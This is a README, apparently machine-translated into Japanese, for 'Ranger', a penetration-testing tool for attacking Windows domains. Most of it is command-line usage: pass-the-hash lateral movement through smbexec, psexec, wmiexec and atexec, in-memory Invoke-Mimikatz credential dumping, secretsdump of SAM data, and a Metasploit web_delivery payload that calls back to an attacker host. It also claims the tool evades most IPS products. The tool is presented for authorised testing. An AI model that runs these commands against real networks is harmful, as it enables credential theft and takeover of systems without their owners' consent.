
セキュリティ専門家がリモートのMicrosoft Windowsベースのシステムにアクセスして操作するためのツール。
セキュリティ専門家がリモートのMicrosoft Windowsベースのシステムにアクセスし、操作するためのツール。
このプロジェクトは、私たちは弓や矢を発明したわけではなく、単により効率的な使用方法を考案したという考え方に基づいています。
Rangerはコマンドライン駆動の攻撃・ペネトレーションテストツールであり、インスタンス化されたカタパルトサーバーを使用してWindowsシステムに対して機能を提供する能力を持っています。ユーザーが資格情報またはハッシュセット(NTLM、LM、LM:NTLM)を持っている限り、信頼関係にあるシステムにアクセスできます。
この機能を使用することで、セキュリティ専門家はメモリから平文の資格情報を抽出し、SAMテーブルにアクセスし、コマンドを実行し、PowerShellスクリプト、Windowsバイナリ、その他のツールを実行できます。現時点では、このツールは、カスタム調整されて検出されない限り、ほとんどのIPSベンダーソリューションをバイパスします。このツールは、法的および/または契約上サポートされた活動を行うセキュリティ専門家を支援するために、自宅のラボを使用して開発されました。
さらなる機能が追加されていますが、現時点では、PowerShell PowerView、PowerShell Mimikatz、Impacketチームに関連するリポジトリからのコミュニティ貢献を利用しています。
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
##コマンド実行: ###ログインユーザーの検出:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
###SMBEXEC コマンドシェル:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
###PSEXEC コマンドシェル:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
###PSEXEC コマンド実行:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
###WMIEXEC コマンド実行:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
###WMIEXEC PowerShell Mimikatz メモリインジェクター:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
###WMIEXEC Metasploit web_delivery メモリインジェクター(Metasploitの設定が必要。以下参照):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
###WMIEXEC カスタムコード メモリインジェクター:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
###ATEXEC コマンド実行:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
###ATEXEC PowerShell Mimikatz メモリインジェクター:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
###ATEXEC Metasploit web_delivery メモリインジェクター(Metasploitの設定が必要。以下参照):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
###ATEXEC カスタムコード メモリインジェクター:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
###SECRETSDUMP カスタムコード メモリインジェクター:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
###貼り付け可能なMimikatzアタックの作成:
ranger.py --invoker -q -v -vv -vvv
###貼り付け可能なweb_deliveryアタックの作成(Metasploitの設定が必要。以下参照):
ranger.py --downloader -q -v -vv -vvv
###貼り付け可能なExecutorアタックの作成:
ranger.py --executor -q -v -vv -vvv
--get-domain-membership を使用して実際のクエリドメインを確認してください。--domain を使用すると、ログインしたドメインとは異なるドメインを対象にできます。ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
##使用上の注意: ###Credファイルの形式:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
###Credentialファイルの注意点:
-d を使用してドメイン名を指定すると、ファイル内のすべてのドメイン名を無視するものと見なされます。###コマンドライン実行:
password
LM:NTLM
:NTLM
PWDUMP
###ターゲットと除外:
####ターゲット、ターゲット範囲、ターゲットCIDR、ターゲットリスト、NMAP XMLターゲット:
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml####除外、除外範囲、除外CIDR、除外リスト、Nmap XML除外:
t を e に置き換えるだけです。-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-fで変更できます。-aで変更できます。-fと-aの両方のオプションが必要です。-aを使用しないようにするには、Executorを使用できます。-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-xで指定する必要があります。-fで定義する必要があります。-aでコマンドをさらに定義することもできます。-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
##FAQ
###SMBEXECおよびWMIEXECのアクセス拒否エラー WORKGROUPの一部であるWindowsマシンでアクセス拒否エラーが発生しています。
ドメインに参加していない場合、Windowsはデフォルトで管理共有を持ちません。SMBEXECは共有が有効であることに依存しています。さらに、WORKGROUPマシンではWMICが有効になっていません。SMBEXECとWMIEXECは、ドメインシステムで有効なプロトコルをターゲットにするように作られています。WORKGROUPシステムでこれらの機能を有効にすることは確かに可能ですが、脆弱なプロトコルを導入することになります(結局のところ、このツールが攻撃対象としているものです)。大切な人がFacebookにも使うメインの家庭用システムでこれらの機能を有効にすることは、おそらく最良のアイデアではありません。
enum4linux のようなツールを使用し、次に ranger の --share share_name 引数を使用して SMBEXEC の実行を試みることができます。##今後の機能: ###カラー出力:
https://pypi.python.org/pypi/colorama を使ったカラー出力の追加を継続#謝辞:
[BSides Charm City 2016: April 23, 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)